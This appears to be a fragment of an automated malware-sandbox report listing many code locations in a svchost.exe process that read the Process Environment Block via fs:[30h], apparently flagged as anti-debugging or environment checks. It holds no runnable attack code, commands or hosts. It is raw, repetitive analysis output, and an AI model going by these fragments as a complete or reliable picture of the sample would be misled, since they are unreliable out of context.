            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]
